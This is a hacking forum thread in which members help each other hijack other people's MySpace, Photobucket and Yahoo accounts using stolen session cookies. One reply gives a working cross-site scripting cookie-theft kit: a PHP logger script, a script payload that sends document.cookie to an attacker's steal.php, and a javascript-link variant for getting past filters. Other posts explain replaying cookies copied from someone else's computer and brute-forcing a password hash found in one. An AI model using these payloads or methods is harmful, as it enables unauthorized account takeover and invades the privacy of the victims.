hyperic
+ Reply to Thread
Results 1 to 13 of 13

Thread: Cookie stealing

  1. #1
    Join Date
    Dec 2006
    Posts
    19

    Cookie stealing

    Let's say that someone is logged into an authenticated session such as myspace.com on their computer. If I were to copy all the myspace cookies and copy them on my computer, would I be logged in on their profile? I tried this for firefox and I don't think it worked, how about IE? 6 or 7

    I also think I might have some old cookie from the acct I want to get in they are in the IE cookie folder. Can I work with these?
    Last edited by whizzlechiz; 12-21-2006 at 12:11 AM.

  2. #2
    Join Date
    Sep 2006
    Posts
    1,651
    I don't know about IE 6 or 7, I've tried replacing cookies, and it doesn't work. You have to use an outside program.

  3. #3
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by whizzlechiz
    Let's say that someone is logged into an authenticated session such as myspace.com on their computer. If I were to copy all the myspace cookies and copy them on my computer, would I be logged in on their profile? I tried this for firefox and I don't think it worked, how about IE? 6 or 7

    I also think I might have some old cookie from the acct I want to get in they are in the IE cookie folder. Can I work with these?
    I don't know why, but I don't think copying them into your cookies folder works. The cookies folder for IE is located here:

    C:\Documents and Settings\[USERNAME]\Cookies\

    However, once you have the cookie files it's easy to extract the data from them and enter into your browser manually with a tool like add n edit cookies. The IE cookie format is as follows:

    *. Cookie name
    2. Cookie value
    *. Host/path for the web server setting the cookie
    4. Flags
    5. Expiration time
    6. Expiration time
    7. Creation time
    8. Creation time
    *. Record delimiter (*)

    ...so any intelligent person can find the data and input it into their browser. Expiration dates can be changed to some time in the future.

    Firefox cookies are held in a profile file at this location:

    C:\Documents and Settings\[Username]\Application Data\Mozilla\Firefox\Profiles\

    ...so it is a lot harder to find the cookie data than when dealing with simple text files. That's why it's always ad****ble to use in-browser methods to extract cookie data than copying it directly from where it's stored. In that form, it is not designed for readability. One way to find the cookie of a certain site is to go to its website and enter in the address bar:

    javascript:alert(document.cookie);

    Or if it is too big for the alert box:

    javascript:document.cookie;

    This will display all the cookie data for the domain you are on - if it still exists on your PC, it will appear.

    As for doing this in IE 6 or 7, just use Firefox and the extension. All self respecting hackers/programmers use Firefox or Opera anyway.
    Last edited by Ezekiel; 12-21-2006 at 01:30 PM.

  4. #4
    Join Date
    Dec 2006
    Posts
    19
    thanks for the info

  5. #5
    Join Date
    Sep 2006
    Posts
    1,651
    Cookies are not really a vulnerability. Everyone who makes logins and such should know that cookies can be used by someone else to gain access to whatever the login gives access to.

    The cookie should come into the hands of the person if:

    a) The cookie file is given by the victim to the person, or the person has access to their computer w/ the cookie file

    b) The victim clicks a link that takes them to a XSS-injection vulnerable page, which will redirect them to the person's own page which will log their cookie from the previous site.

    EDIT: The person who posted before me must have deleted their post or something, this post was a response.

  6. #6
    Join Date
    Jun 2006
    Posts
    459
    [url]http://www.ssgroup.org/forum/index.php?showtopic=2*7[/url]
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ȧ

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

  7. #7
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by ~~smart~fool~~
    [url]http://www.ssgroup.org/forum/index.php?showtopic=2*7[/url]
    That forum requires membership.

    If there's any relevant discussion in that topic, feel free to repost it here so people don't have to register.

  8. #8
    Join Date
    Jun 2006
    Posts
    459
    Quote Originally Posted by mike*0*
    That forum requires membership.

    If there's any relevant discussion in that topic, feel free to repost it here so people don't have to register.
    Sorry my bad.

    Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
    you need to have a way of sending the cookie to your script. Writing the script to accept
    the cookie is the easy part, whereas finding a way to send it to your script is the hard
    part. I'll show you an example of a pHp script that accepts cookies:

    CODE
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>


    And there you have it, a simple cookiestealer. The way this script works is that it accepts
    the cookie when it is passed as a variable, in this case 'cookie' in the URL, and then
    saves it to a file called 'log.txt'. For example:

    CODE
    [url]http://yoursite.com/steal.php?cookie=[/url]


    steal.php is the filename of the script we just wrote, ? lets the script know that we are
    going to pass some variables to it, and after that we can set cookie equal to whatever
    we want, but what we want to do is set cookie equal to the cookie from the site. This
    is the second and harder part of the cookiestealer.

    Most websites apply some sort of filter to input, so that you can't directly insert your
    own code. XSS deals with finding exploits within filters, allowing you to put your own
    code into a website. This might sound difficult, and in most cases it's not easy, but
    it can be very simple.

    Any website that allows you to post text potentially allows you to insert your own code
    into the website. Some examples of these types of sites are forums, guestbooks, any site
    with a "member profile", etc. And any of these sites that have users who log in also
    probably use cookies. Now you know what sort of sites might be vulnerable to
    cookiestealing.

    Let's assume that we have a website that someone made. This website has user login
    capability as well as a guestbook. And let's also assume that this website doesn't have
    any kind of filtering on what can be put into the guestbook. This means that you can
    put HTML and Javascript directly into your post in the guestbook. I'll give you an
    example of some code that we could put into a guestbook post that would send the user's
    cookie to out script:

    CODE
    <script>
    document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
    </script>


    Now whenever someone views the page that you posted this on, they will be redirected to
    your script with their cookie from this site in the URL. If you were to look at log.txt
    now, you'd see the cookies of whoever looked at that page.

    But cookiestealing is never that easy. Let's assume now that the administrator of this
    site got smart, and decided to filter out script tags. Now you code doesn't work, so
    we have to try and evade the filter. In this instance, it's easy enough:

    CODE
    <a href="java script:void(document.location='http://yoursite.com/steal.php?cookie='+
    document.cookie)">Click Me</a>


    In this case, when the user clicks on the link they will be sent to your stealer with their
    cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get
    around filters.
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ȧ

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

  9. #9
    Join Date
    Dec 2006
    Posts
    19
    Ok, I have a bunch of cookie files for various sites. I am viewing them with "Cookie Editor" there is a lot of information. Shouldn't I just be able to edit the expiration dates and go to the site and have access?

    I guess that's in a perfect world.

    I am at least trying to get a logon name to show up in IE so I can see if I'm on the right *****(these are IE cookies, blah) but I can't figure this crap out. I've copied the cookies to my IE cookie folder and tried editing them with the program from there but nothing is working. Any s***estions? I also have add n edit cookies for firefox. I imported the IE cookies into firefox, and the ones I am editing all have a future expiration date but nothing works :\

    I also have C&B and I found a PW hash in one of the cookies and I'm brute forcing it (got the md5 hash through c&b) I have an idea of some of the letters and general length, so it only will take like *0 hrs but I have no idea if it'll work or not.

    I am working with myspace and photobucket cookies. Is any familiar with any of these. I see 2 hash's that could potentially be the PW hash (in the myspace cookie, using the cookie editor program, or is that not possible) the cookie names are IID and DERDB.

    I also have yahoo cookies
    Last edited by whizzlechiz; 01-28-2007 at 03:55 AM.

  10. #10
    Join Date
    Jun 2006
    Posts
    459
    Login name most likely encoded with their own formula. Most of those cookies arent as nooby as some of these vbulliten sites. May not be possible to tamper with myscace cookies(not that you would want to)
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ȧ

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

  11. #11
    Join Date
    Dec 2006
    Posts
    19
    Quote Originally Posted by ~~smart~fool~~
    not that you would want to)
    oh, of course not :P. I'm trying to get a PW is all
    Last edited by whizzlechiz; 01-31-2007 at 07:24 PM.

  12. #12
    Join Date
    Jan 2007
    Posts
    18

    hey

    does anyone know how to get someone elses myspace cookies without them clicking on anything. I know its possible because my friend showed it to me but he didn't tell me how to do it.

  13. #13
    Join Date
    Oct 2006
    Posts
    3
    I need some help!
    Who can help me , with the message part , for yahoo.
    Can anyone tell me , a new mode, to take the yahoo cookie?

+ Reply to Thread

Similar Threads

  1. Moonbat's Guide to Cookie Stealing
    By Moonbat in forum Tutorials
    Replies: 4
    Last Post: 08-15-2015, 08:58 AM
  2. Stealing IP addresses
    By Canuck in forum Internet Privacy
    Replies: 3
    Last Post: 07-11-2007, 12:14 PM
  3. Er, hotmail password 'stealing'
    By Unregistered in forum Internet Privacy
    Replies: 38
    Last Post: 05-27-2006, 05:38 AM
  4. Ip Stealing
    By carlo in forum Internet Privacy
    Replies: 4
    Last Post: 10-30-2005, 03:15 PM
  5. php cookie stealing script
    By carlo in forum Internet Privacy
    Replies: 0
    Last Post: 08-14-2005, 02:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts